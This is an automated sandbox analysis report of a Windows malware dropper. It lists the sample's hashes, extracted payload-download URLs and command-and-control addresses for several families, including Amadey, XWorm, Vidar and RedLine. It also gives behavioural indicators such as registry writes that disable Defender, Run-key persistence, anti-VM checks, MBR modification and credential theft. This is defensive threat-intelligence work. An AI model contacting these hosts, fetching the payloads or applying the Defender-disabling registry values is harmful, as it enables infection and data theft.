Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
19-02-2025 06:02
Static task
static1
Behavioral task
behavioral1
Sample
efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe
Resource
win10v2004-20250217-en
General
-
Target
efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe
-
Size
2.0MB
-
MD5
41bfbce19932e1a75259a03ba23bdd33
-
SHA1
af829594dc191d8dc5f0bcdde496d1b98130d754
-
SHA256
efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989
-
SHA512
cd22466d28e428f54be72326d3475065711d64e637d03a1c043e66591cd6508b8a88ba1e1fb0b34b48275b6cd5e8ad17346ad032a77d2c87e44fd129e4ff538d
-
SSDEEP
49152:dOcb9F16Y7tPT0JCy0wzbtpFfUrSv/YVNNHAqo:koV7t70JCyCuv/uBo
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
xworm
5.0
45.154.98.175:7000
0HzpJoisb4u9PgIO
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
redline
cheat
103.84.89.222:33791
Signatures
-
Amadey family
-
Detect Vidar Stealer 6 IoCs
resource yara_rule behavioral2/memory/1632-486-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1632-488-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1632-513-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1632-514-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1632-515-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1632-522-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000d000000023c76-293.dat family_xworm behavioral2/memory/4384-308-0x0000000000710000-0x0000000000720000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/1880-147-0x0000000000030000-0x0000000000490000-memory.dmp healer behavioral2/memory/1880-148-0x0000000000030000-0x0000000000490000-memory.dmp healer behavioral2/memory/1880-258-0x0000000000030000-0x0000000000490000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/4824-824-0x0000000000E30000-0x00000000012A8000-memory.dmp family_sectoprat behavioral2/memory/4824-825-0x0000000000E30000-0x00000000012A8000-memory.dmp family_sectoprat -
Sectoprat family
-
Systembc family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 25 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2a2c7885e3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 075b5e47c5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempSXLHRVLJEIQLRLTKI0VVTSN5GY8BH7HH.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5f35f8572a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9ce8b15e02.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fmqsafh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9f63f4acb4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b56e837fb4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ pokxh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 67c3b98f4d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c55a0e6e0b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 207737d668.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c8ec90ad9b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4fce678d37.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 20 4464 powershell.exe 35 2280 powershell.exe 87 4912 powershell.exe 91 4912 powershell.exe 103 4912 powershell.exe 105 4912 powershell.exe 129 4912 powershell.exe 140 4912 powershell.exe 148 4912 powershell.exe 150 4912 powershell.exe 158 4912 powershell.exe 164 4912 powershell.exe 168 4912 powershell.exe 170 4912 powershell.exe 172 4912 powershell.exe 184 4912 powershell.exe 186 4912 powershell.exe 187 4912 powershell.exe 188 4912 powershell.exe 189 4912 powershell.exe 190 4912 powershell.exe 191 4912 powershell.exe 192 4912 powershell.exe 193 4912 powershell.exe 194 4912 powershell.exe 195 4912 powershell.exe 196 4912 powershell.exe 197 4912 powershell.exe 198 4912 powershell.exe 204 4912 powershell.exe 205 4912 powershell.exe 213 4912 powershell.exe 214 4912 powershell.exe 215 4912 powershell.exe 217 4912 powershell.exe 218 4912 powershell.exe 224 4912 powershell.exe 227 4912 powershell.exe 228 4912 powershell.exe 230 4912 powershell.exe 232 4912 powershell.exe 234 4912 powershell.exe 236 4912 powershell.exe 238 4912 powershell.exe 242 4912 powershell.exe 245 4912 powershell.exe 248 4912 powershell.exe 249 4912 powershell.exe 253 4912 powershell.exe 256 4912 powershell.exe 259 4912 powershell.exe 260 4912 powershell.exe 263 4912 powershell.exe 264 4912 powershell.exe 265 4912 powershell.exe 269 4912 powershell.exe 272 4912 powershell.exe 280 4912 powershell.exe 281 4912 powershell.exe 282 4912 powershell.exe 293 4912 powershell.exe 298 4912 powershell.exe 300 4912 powershell.exe 303 4912 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 4464 powershell.exe 2280 powershell.exe 5096 powershell.exe 5720 powershell.exe 2524 powershell.exe 3604 powershell.exe 4364 powershell.exe 2736 powershell.exe -
Downloads MZ/PE file 32 IoCs
flow pid Process 379 5720 powershell.exe 262 5308 BitLockerToGo.exe 295 5880 futors.exe 295 5880 futors.exe 295 5880 futors.exe 20 4464 powershell.exe 35 2280 powershell.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 11 3016 skotes.exe 18 3016 skotes.exe 247 6120 BitLockerToGo.exe 261 3016 skotes.exe 261 3016 skotes.exe 261 3016 skotes.exe 261 3016 skotes.exe 361 5880 futors.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4576 chrome.exe 5264 msedge.exe 744 msedge.exe 4888 msedge.exe 4468 chrome.exe 3248 chrome.exe 4376 chrome.exe 6096 msedge.exe 5396 msedge.exe -
Checks BIOS information in registry 2 TTPs 50 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 075b5e47c5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c55a0e6e0b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 67c3b98f4d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5f35f8572a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5f35f8572a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fmqsafh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9ce8b15e02.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9f63f4acb4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9f63f4acb4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fmqsafh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 075b5e47c5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempSXLHRVLJEIQLRLTKI0VVTSN5GY8BH7HH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c8ec90ad9b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b56e837fb4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c55a0e6e0b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 207737d668.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion pokxh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 67c3b98f4d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2a2c7885e3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c8ec90ad9b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b56e837fb4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion pokxh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4fce678d37.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4fce678d37.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2a2c7885e3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 207737d668.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempSXLHRVLJEIQLRLTKI0VVTSN5GY8BH7HH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9ce8b15e02.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation 7aencsM.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 51 IoCs
pid Process 3016 skotes.exe 760 oVpNTUm.exe 1348 3omTNLZ.exe 3936 ce5fd68915.exe 1880 TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE 4480 pokxh.exe 4032 9f63f4acb4.exe 712 9ce8b15e02.exe 4028 483d2fa8a0d53818306efeb32d3.exe 2816 e11c49ce9a.exe 1432 skotes.exe 4668 7bf33bfbf1.exe 4384 C3hYpvm.exe 3400 Bjkm5hE.exe 1192 Bjkm5hE.exe 3656 qFqSpAp.exe 5116 oVpNTUm.exe 4604 DTQCxXZ.exe 920 7aencsM.exe 1632 7aencsM.exe 900 3omTNLZ.exe 3484 fmqsafh.exe 5240 d2YQIJa.exe 5660 Ta3ZyUR.exe 5704 Ta3ZyUR.exe 6080 67c3b98f4d.exe 2780 c55a0e6e0b.exe 4668 2a2c7885e3.exe 5160 skotes.exe 4824 207737d668.exe 5320 c8ec90ad9b.exe 1720 amnew.exe 5880 futors.exe 5824 b56e837fb4.exe 4604 075b5e47c5.exe 6032 4fce678d37.exe 3688 trano1221.exe 1204 trano1221.exe 4604 2ab110fa1b.exe 1784 con12312211221.exe 1760 con12312211221.exe 1580 95e1feba6d.exe 5476 monthdragon.exe 5288 monthdragon.exe 5312 monthdragon.exe 5352 TempSXLHRVLJEIQLRLTKI0VVTSN5GY8BH7HH.EXE 6808 12321321.exe 5748 alex12112.exe 468 alex12112.exe 3840 9cf6487121.exe 4528 5f35f8572a.exe -
Identifies Wine through registry keys 2 TTPs 25 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine c55a0e6e0b.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 207737d668.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 4fce678d37.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 9f63f4acb4.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine b56e837fb4.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 075b5e47c5.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 2a2c7885e3.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine TempSXLHRVLJEIQLRLTKI0VVTSN5GY8BH7HH.EXE Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 5f35f8572a.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine pokxh.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 9ce8b15e02.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine fmqsafh.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 67c3b98f4d.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine c8ec90ad9b.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine oVpNTUm.exe -
Loads dropped DLL 31 IoCs
pid Process 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe 1204 trano1221.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086706021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C3hYpvm.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\075b5e47c5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086821001\\075b5e47c5.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4fce678d37.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086822001\\4fce678d37.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2ab110fa1b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086823001\\2ab110fa1b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\95e1feba6d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086824001\\95e1feba6d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9cf6487121.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008080101\\9cf6487121.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ce5fd68915.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086705101\\ce5fd68915.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 9ce8b15e02.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000a000000023c01-65.dat autoit_exe behavioral2/files/0x0007000000023da7-1523.dat autoit_exe behavioral2/files/0x0009000000023d2d-1567.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs
pid Process 4844 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 3016 skotes.exe 760 oVpNTUm.exe 1348 3omTNLZ.exe 1880 TempBJB8MMEDQILQJYVSA5CANMNRZKTGT1X2.EXE 4480 pokxh.exe 4032 9f63f4acb4.exe 712 9ce8b15e02.exe 4028 483d2fa8a0d53818306efeb32d3.exe 1432 skotes.exe 5116 oVpNTUm.exe 900 3omTNLZ.exe 3484 fmqsafh.exe 5240 d2YQIJa.exe 6080 67c3b98f4d.exe 2780 c55a0e6e0b.exe 4668 2a2c7885e3.exe 5160 skotes.exe 4824 207737d668.exe 5320 c8ec90ad9b.exe 5824 b56e837fb4.exe 4604 075b5e47c5.exe 6032 4fce678d37.exe 5352 TempSXLHRVLJEIQLRLTKI0VVTSN5GY8BH7HH.EXE 4528 5f35f8572a.exe -
Suspicious use of SetThreadContext 9 IoCs
